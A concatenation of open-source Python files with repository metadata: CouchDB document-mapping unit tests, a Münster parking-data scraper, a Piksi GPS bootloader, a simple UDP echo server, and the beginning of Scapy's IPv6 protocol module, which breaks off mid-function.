post = Post(title='Foo bar')
assert post.id is None
post.store(self.db)
assert post.id is not None
self.assertEqual('Foo bar', self.db[post.id]['title'])
def test_explicit_id_via_init(self):
class Post(mapping.Document):
title = mapping.TextField()
post = Post(id='foo_bar', title='Foo bar')
self.assertEqual('foo_bar', post.id)
post.store(self.db)
self.assertEqual('Foo bar', self.db['foo_bar']['title'])
def test_explicit_id_via_setter(self):
class Post(mapping.Document):
title = mapping.TextField()
post = Post(title='Foo bar')
post.id = 'foo_bar'
self.assertEqual('foo_bar', post.id)
post.store(self.db)
self.assertEqual('Foo bar', self.db['foo_bar']['title'])
def test_change_id_failure(self):
class Post(mapping.Document):
title = mapping.TextField()
post = Post(title='Foo bar')
post.store(self.db)
post = Post.load(self.db, post.id)
try:
post.id = 'foo_bar'
self.fail('Excepted AttributeError')
except AttributeError, e:
self.assertEqual('id can only be set on new documents', e.args[0])
def test_batch_update(self):
class Post(mapping.Document):
title = mapping.TextField()
post1 = Post(title='Foo bar')
post2 = Post(title='Foo baz')
results = self.db.update([post1, post2])
self.assertEqual(2, len(results))
assert results[0][0] is True
assert results[1][0] is True
def test_store_existing(self):
class Post(mapping.Document):
title = mapping.TextField()
post = Post(title='Foo bar')
post.store(self.db)
post.store(self.db)
self.assertEqual(len(list(self.db.view('_all_docs'))), 1)
def test_old_datetime(self):
dt = mapping.DateTimeField()
assert dt._to_python(u'1880-01-01T00:00:00Z')
def test_get_has_default(self):
doc = mapping.Document()
doc.get('foo')
doc.get('foo', None)
class ListFieldTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_to_json(self):
# See <http://code.google.com/p/couchdb-python/issues/detail?id=14>
class Post(mapping.Document):
title = mapping.TextField()
comments = mapping.ListField(mapping.DictField(
mapping.Mapping.build(
author = mapping.TextField(),
content = mapping.TextField(),
)
))
post = Post(title='Foo bar')
post.comments.append(author='myself', content='Bla bla')
post.comments = post.comments
self.assertEqual([{'content': 'Bla bla', 'author': 'myself'}],
post.comments)
def test_proxy_append(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
thing.numbers.append(Decimal('3.0'))
self.assertEqual(3, len(thing.numbers))
self.assertEqual(Decimal('3.0'), thing.numbers[2])
def test_proxy_append_kwargs(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
self.assertRaises(TypeError, thing.numbers.append, foo='bar')
def test_proxy_contains(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
assert isinstance(thing.numbers, mapping.ListField.Proxy)
assert '1.0' not in thing.numbers
assert Decimal('1.0') in thing.numbers
def test_proxy_count(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
self.assertEqual(1, thing.numbers.count(Decimal('1.0')))
self.assertEqual(0, thing.numbers.count('1.0'))
def test_proxy_index(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
self.assertEqual(0, thing.numbers.index(Decimal('1.0')))
self.assertRaises(ValueError, thing.numbers.index, '3.0')
def test_proxy_insert(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
thing.numbers.insert(0, Decimal('0.0'))
self.assertEqual(3, len(thing.numbers))
self.assertEqual(Decimal('0.0'), thing.numbers[0])
def test_proxy_insert_kwargs(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
self.assertRaises(TypeError, thing.numbers.insert, 0, foo='bar')
def test_proxy_remove(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
thing.numbers.append(Decimal('1.0'))
thing.numbers.remove(Decimal('1.0'))
def test_proxy_iter(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
self.db['test'] = {'numbers': ['1.0', '2.0']}
thing = Thing.load(self.db, 'test')
assert isinstance(thing.numbers[0], Decimal)
def test_proxy_iter_dict(self):
class Post(mapping.Document):
comments = mapping.ListField(mapping.DictField)
self.db['test'] = {'comments': [{'author': 'Joe', 'content': 'Hey'}]}
post = Post.load(self.db, 'test')
assert isinstance(post.comments[0], dict)
def test_proxy_pop(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
thing.numbers = [Decimal('%d' % i) for i in range(3)]
self.assertEqual(thing.numbers.pop(), Decimal('2.0'))
self.assertEqual(len(thing.numbers), 2)
self.assertEqual(thing.numbers.pop(0), Decimal('0.0'))
def test_proxy_slices(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
thing.numbers = [Decimal('%d' % i) for i in range(5)]
ll = thing.numbers[1:3]
self.assertEqual(len(ll), 2)
self.assertEqual(ll[0], Decimal('1.0'))
thing.numbers[2:4] = [Decimal('%d' % i) for i in range(6, 8)]
self.assertEqual(thing.numbers[2], Decimal('6.0'))
self.assertEqual(thing.numbers[4], Decimal('4.0'))
self.assertEqual(len(thing.numbers), 5)
del thing.numbers[3:]
self.assertEquals(len(thing.numbers), 3)
def test_mutable_fields(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing.wrap({'_id': 'foo', '_rev': 1}) # no numbers
thing.numbers.append('1.0')
thing2 = Thing(id='thing2')
self.assertEqual([i for i in thing2.numbers], [])
class DocumentSchemaFieldTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_simple(self):
class OtherThing(mapping.DocumentSchema):
text = mapping.TextField()
class Thing(mapping.Document):
other = OtherThing()
thing = Thing.wrap({"_id": 42, "_rev": 1, "other":{"text": "something"}})
self.assertEqual(thing.other.text, "something")
thing = Thing()
thing.other = OtherThing()
thing.other.text = "something"
self.assertEqual(thing.unwrap(), {"other":{"text": "something"}})
def test_list(self):
class OtherThing(mapping.DocumentSchema):
text = mapping.TextField()
class Thing(mapping.Document):
other = mapping.ListField(OtherThing())
thing = Thing.wrap({"_id": 42, "_rev": 1,
"other":[{"text": "something"}, {"text": "other thing"}]})
self.assertEqual(thing.other[0].text, "something")
self.assertEqual(thing.other[1].text, "other thing")
thing = Thing()
thing.other.append(OtherThing(text="one"))
thing.other.append(OtherThing(text="two"))
self.assertEqual(thing.unwrap(),
{"other":[{"text": "one"}, {"text": "two"}]})
def test_dict(self):
class OtherThing(mapping.DocumentSchema):
text = mapping.TextField()
class Thing(mapping.Document):
other = mapping.DictField(schema=OtherThing())
thing = Thing.wrap({"_id": 42, "_rev": 1,
"other": {
"a": {"text": "something"},
"b": {"text": "other thing"}
}
})
self.assertEqual(thing.other["a"]["text"], "something")
self.assertEqual(thing.other["b"]["text"], "other thing")
thing = Thing()
thing.other["a"] = OtherThing(text="one")
thing.other["b"] = OtherThing(text="two")
self.assertEqual(thing.unwrap(), {"other":
{"a": {"text": "one"}, "b": {"text": "two"}}})
all_map_func = 'function(doc) { emit(doc._id, doc); }'
class WrappingTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
class Item(mapping.Document):
with_include_docs = mapping.ViewField('test', all_map_func,
include_docs=True)
without_include_docs = mapping.ViewField('test', all_map_func)
def setUp(self):
super(WrappingTestCase, self).setUp()
design.ViewDefinition.sync_many(
self.db, [self.Item.with_include_docs,
self.Item.without_include_docs])
def test_viewfield_property(self):
self.Item().store(self.db)
results = self.Item.with_include_docs(self.db)
self.assertEquals(type(results.rows[0]), self.Item)
results = self.Item.without_include_docs(self.db)
self.assertEquals(type(results.rows[0]), self.Item)
def test_view(self):
self.Item().store(self.db)
results = self.Item.view(self.db, 'test/without_include_docs')
self.assertEquals(type(results.rows[0]), self.Item)
results = self.Item.view(self.db, 'test/without_include_docs',
include_docs=True)
self.assertEquals(type(results.rows[0]), self.Item)
def test_query(self):
self.Item().store(self.db)
results = self.Item.query(self.db, all_map_func, None)
self.assertEquals(type(results.rows[0]), self.Item)
results = self.Item.query(self.db, all_map_func, None, include_docs=True)
self.assertEquals(type(results.rows[0]), self.Item)
def suite():
suite = unittest.TestSuite()
suite.addTest(doctest.DocTestSuite(mapping))
suite.addTest(unittest.makeSuite(DocumentTestCase, 'test'))
suite.addTest(unittest.makeSuite(ListFieldTestCase, 'test'))
suite.addTest(unittest.makeSuite(DocumentSchemaFieldTestCase, 'test'))
suite.addTest(unittest.makeSuite(WrappingTestCase, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
Roger/couchdb-python
|
couchdb/tests/mapping.py
|
Python
|
bsd-3-clause
| 12,137
|
from bs4 import BeautifulSoup
from park_api.util import convert_date
from park_api.geodata import GeoData
state_map = {
"frei": "open",
"geschlossen": "closed",
"besetzt": "open"
}
geodata = GeoData(__file__)
def parse_html(html):
soup = BeautifulSoup(html, "html.parser")
lot_table_trs = soup.select("div#parkingList table")[0].find_all("tr")
date_field = soup.find(id="lastRefresh").text.strip()
data = {
"last_updated": convert_date(date_field, "%d.%m.%Y %H:%M Uhr"),
"lots": []
}
for tr in lot_table_trs[1:-1]:
tds = tr.find_all("td")
type_and_name = process_name(tds[0].text.strip())
lot = geodata.lot(tds[0].text.strip())
data["lots"].append({
"name": type_and_name[1].strip("\n"),
"lot_type": type_and_name[0],
"free": int(tds[1].text),
"total": lot.total,
"state": state_map.get(tds[2].text, ""),
"coords": lot.coords,
"id": lot.id,
"forecast": False
})
return data
def process_name(name):
lot_type = name[:3].strip()
lot_name = name[3:].strip()
type_mapping = {
"PP": "Parkplatz",
"PH": "Parkhaus",
}
if lot_type in type_mapping.keys():
lot_type = type_mapping[lot_type]
else:
lot_type = ""
lot_name = name
return lot_type, lot_name
|
offenesdresden/ParkAPI
|
park_api/cities/Muenster.py
|
Python
|
mit
| 1,414
|
#!/usr/bin/env python
#
# Bootloader for the Swift Navigation Piksi GPS Receiver
#
# Copyright (C) 2010 Gareth McMullin <gareth@blacksphere.co.nz>
# Copyright (C) 2011 Piotr Esden-Tempski <piotr@esden.net>
# Copyright (C) 2013-2014 Swift Navigation Inc <www.swift-nav.com>
#
# Contacts: Colin Beighley <colin@swift-nav.com>
# Fergus Noble <fergus@swift-nav.com>
#
# Based on luftboot, a bootloader for the Paparazzi UAV project.
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
The :mod:`piksi_tools.bootload` module contains functions loading firmware
images.
"""
from __future__ import absolute_import, print_function
import random
import sys
import threading
from sbp.client import Framer, Handler
from sbp.logging import SBP_MSG_LOG, SBP_MSG_PRINT_DEP
from sbp.piksi import SBP_MSG_COMMAND_RESP, MsgCommandReq, MsgReset
from piksi_tools import serial_link
from piksi_tools.fileio import FileIO
from piksi_tools import __version__ as VERSION
def get_args():
"""
Get and parse arguments.
"""
parser = serial_link.base_cl_options()
parser.description = 'Piksi Bootloader version ' + VERSION
parser.add_argument("firmware", help="the image set file to write to flash.")
return parser.parse_args()
def shell_command(link, cmd, timeout=None, progress_cb=None):
ev = threading.Event()
seq = random.randint(0, 0xffffffff)
ret = {}
elapsed_intervals = 0
def resp_handler(msg, **kwargs):
if msg.sequence == seq:
ret['code'] = msg.code
ev.set()
link.add_callback(resp_handler, SBP_MSG_COMMAND_RESP)
link(MsgCommandReq(sequence=seq, command=cmd))
while (elapsed_intervals < timeout):
ev.wait(timeout)
if progress_cb:
progress_cb(float(elapsed_intervals) / float(timeout) * 100)
elapsed_intervals += 1
if len(ret.items()) == 0:
print(("Shell command timeout: execution exceeded {0} "
"seconds with no response.").format(timeout))
return -255
return ret['code']
def main():
"""
Get configuration, get driver, and build handler and start it.
"""
args = get_args()
driver = serial_link.get_base_args_driver(args)
# Driver with context
# Handler with context
with Handler(Framer(driver.read, driver.write, verbose=args.verbose)) as link:
data = bytearray(open(args.firmware, 'rb').read())
def progress_cb(size, _):
sys.stdout.write("\rProgress: %d%% \r" %
(100 * size / len(data)))
sys.stdout.flush()
print('Transferring image file...')
FileIO(link).write(
b"upgrade.image_set.bin", data, progress_cb=progress_cb)
print('Committing file to flash...')
link.add_callback(serial_link.log_printer, SBP_MSG_LOG)
link.add_callback(serial_link.printer, SBP_MSG_PRINT_DEP)
code = shell_command(link, b"upgrade_tool upgrade.image_set.bin", 300)
if code != 0:
print('Failed to perform upgrade (code = %d)' % code)
return
print('Resetting Piksi...')
link(MsgReset(flags=0))
if __name__ == "__main__":
main()
|
swift-nav/piksi_tools
|
piksi_tools/bootload_v3.py
|
Python
|
lgpl-3.0
| 3,528
|
"""
Примитивный UDP сервер.
"""
import socket
UDP_IP = "127.0.0.1"
UDP_PORT = 9999
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((UDP_IP, UDP_PORT))
while True:
data, addr = sock.recvfrom(1024)
print("received message:", data, "from", addr)
sock.sendto(data, addr)
|
park-python/course
|
lectures/06_Internet/udp_echo_server_simple.py
|
Python
|
bsd-3-clause
| 318
|
#############################################################################
# #
# inet6.py --- IPv6 support for Scapy #
# see http://natisbad.org/IPv6/ #
# for more information #
# #
# Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> #
# Arnaud Ebalard <arnaud.ebalard@eads.net> #
# #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License version 2 as #
# published by the Free Software Foundation. #
# #
# This program is distributed in the hope that it will be useful, but #
# WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# General Public License for more details. #
# #
#############################################################################
"""
IPv6 (Internet Protocol v6).
"""
from __future__ import absolute_import
from __future__ import print_function
from hashlib import md5
import random
import socket
import struct
from time import gmtime, strftime
from scapy.arch import get_if_hwaddr
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.base_classes import Gen
from scapy.compat import chb, orb, raw, plain_str, bytes_encode
from scapy.consts import WINDOWS
from scapy.config import conf
from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \
MTU
from scapy.error import log_runtime, warning
from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \
DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \
LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \
ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \
X3BytesField, XBitField, XIntField, XShortField
from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \
UDP, UDPerror
from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
import scapy.modules.six as six
from scapy.packet import bind_layers, Packet, Raw
from scapy.sendrecv import sendp, sniff, sr, srp1
from scapy.supersocket import SuperSocket, L3RawSocket
from scapy.utils import checksum, strxor
from scapy.pton_ntop import inet_pton, inet_ntop
from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
from scapy.volatile import RandInt, RandShort
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = 4
if conf.route6 is None:
# unused import, only to initialize conf.route6
import scapy.route6 # noqa: F401
##########################
# Neighbor cache stuff #
##########################
conf.netcache.new_cache("in6_neighbor", 120)
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""Sends and receive an ICMPv6 Neighbor Solicitation message
This function sends an ICMPv6 Neighbor Solicitation message
to get the MAC address of the neighbor with specified IPv6 address address.
'src' address is used as source of the message. Message is sent on iface.
By default, timeout waiting for an answer is 1 second.
If no answer is gathered, None is returned. Else, the answer is
returned (ethernet frame).
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
chainCC=chainCC)
return res
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
"""Returns the MAC address corresponding to an IPv6 address
neighborCache.get() method is used on instantiated neighbor cache.
Resolution mechanism is described in associated doc string.
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
if isinstance(ip6, Net6):
ip6 = str(ip6)
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff, a, nh = conf.route6.route(ip6)
if iff == conf.loopback_name:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
#############################################################################
#############################################################################
# IPv6 Class #
#############################################################################
#############################################################################
ipv6nh = {0: "Hop-by-Hop Option Header",
4: "IP",
6: "TCP",
17: "UDP",
41: "IPv6",
43: "Routing Header",
44: "Fragment Header",
47: "GRE",
50: "ESP Header",
51: "AH Header",
58: "ICMPv6",
59: "No Next Header",
60: "Destination Option Header",
112: "VRRP",
132: "SCTP",
135: "Mobility Header"}
ipv6nhcls = {0: "IPv6ExtHdrHopByHop",
4: "IP",
6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
50: "ESP",
51: "AH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt"}
class IP6ListField(StrField):
__slots__ = ["count_from", "length_from"]
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16 * len(i)
def i2count(self, pkt, i):
if isinstance(i, list):
return len(i)
return 0
def getfield(self, pkt, s):
c = tmp_len = None
if self.length_from is not None:
tmp_len = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = b""
remain = s
if tmp_len is not None:
remain, ret = s[:tmp_len], s[tmp_len:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain + ret, lst
def i2m(self, pkt, x):
s = b""
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except Exception:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self, pkt, x):
s = []
if x is None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self, p):
if self.nh == 58: # ICMPv6
t = orb(p[0])
if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501
if t == 130 and len(p) >= 28:
# RFC 3810 - 8.1. Query Version Distinctions
return ICMPv6MLQuery2
return icmp6typescls.get(t, Raw)
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header
return IPv6ExtHdrSegmentRouting
return ipv6nhcls.get(self.nh, Raw)
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [BitField("version", 6, 4),
BitField("tc", 0, 8),
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
DestIP6Field("dst", "::1")]
def route(self):
"""Used to select the L2 address"""
dst = self.dst
if isinstance(dst, Gen):
dst = next(iter(dst))
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src, self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
tmp_len = len(p) - 40
p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
return p
def extract_padding(self, data):
"""Extract the IPv6 payload"""
if self.plen == 0 and self.nh == 0 and len(data) >= 8:
# Extract Hop-by-Hop extension length
hbh_len = orb(data[1])
hbh_len = 8 + hbh_len * 8
# Extract length from the Jumbogram option
# Note: the following algorithm take advantage of the Jumbo option
# mandatory alignment (4n + 2, RFC2675 Section 2)
jumbo_len = None
idx = 0
offset = 4 * idx + 2
while offset <= len(data):
opt_type = orb(data[offset])
if opt_type == 0xc2: # Jumbo option
jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501
break
offset = 4 * idx + 2
idx += 1
if jumbo_len is None:
log_runtime.info("Scapy did not find a Jumbo option")
jumbo_len = 0
tmp_len = hbh_len + jumbo_len
else:
tmp_len = self.plen
return data[:tmp_len], data[tmp_len:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
return struct.pack("B", self.nh) + self.payload.hashret()
if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6
return self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501
# could be anything from the original list ...
if 1:
sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
# With segment routing header (rh == 4), the destination is
# the first address of the IPv6 addresses list
try:
sd = self.addresses[0]
except IndexError:
sd = self.dst
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, ss)
return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501
else:
return struct.pack("B", nh) + self.payload.hashret()
def answers(self, other):
if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP
if self.nh in [4, 41]:
return self.payload.answers(other)
if isinstance(other, IPv6) and other.nh in [4, 41]:
return self.answers(other.payload)
if isinstance(other, IP) and other.proto in [4, 41]:
return self.answers(other.payload)
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
# ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
# class could implement a specific answers method that perform
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
class IPv46(IP):
"""
This class implements a dispatcher that is used to detect the IP version
while parsing Raw IP pcap files.
"""
@classmethod
def dispatch_hook(cls, _pkt=None, *_, **kargs):
if _pkt:
if orb(_pkt[0]) >> 4 == 6:
return IPv6
elif kargs.get("version") == 6:
return IPv6
return IP
def inet6_register_l3(l2, l3):
return getmacbyip6(l3.dst)
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # < Basic case
(ss == os and request_has_rh)):
# ^ Request has a RH : don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = raw(selfup)
s2 = raw(otherup)
tmp_len = min(len(s1), len(s2))
res = s1[:tmp_len] == s2[:tmp_len]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = raw(selfup)
s2 = raw(otherup)
tmp_len = min(len(s1), len(s2))
return s1[:tmp_len] == s2[:tmp_len]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
# Upper Layer Checksum computation #
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [IP6Field("src", "::"),
IP6Field("dst", "::"),
IntField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0)]
def in6_chksum(nh, u, p):
"""
As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
Performs IPv6 Upper Layer checksum computation.
This function operates by filling a pseudo header class instance
(PseudoIPv6) with:
- Next Header value
- the address of _final_ destination (if some Routing Header with non
segleft field is present in underlayer classes, last address is used.)
- the address of _real_ source (basically the source address of an
IPv6 class instance available in the underlayer or the source address
in HAO option if some Destination Option header found in underlayer
includes this option).
- the length is the length of provided payload string ('p')
:param nh: value of upper layer protocol
:param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
provided with all under layers (IPv6 and all extension headers,
for example)
:param p: the payload of the upper layer provided as a string
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u is not None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
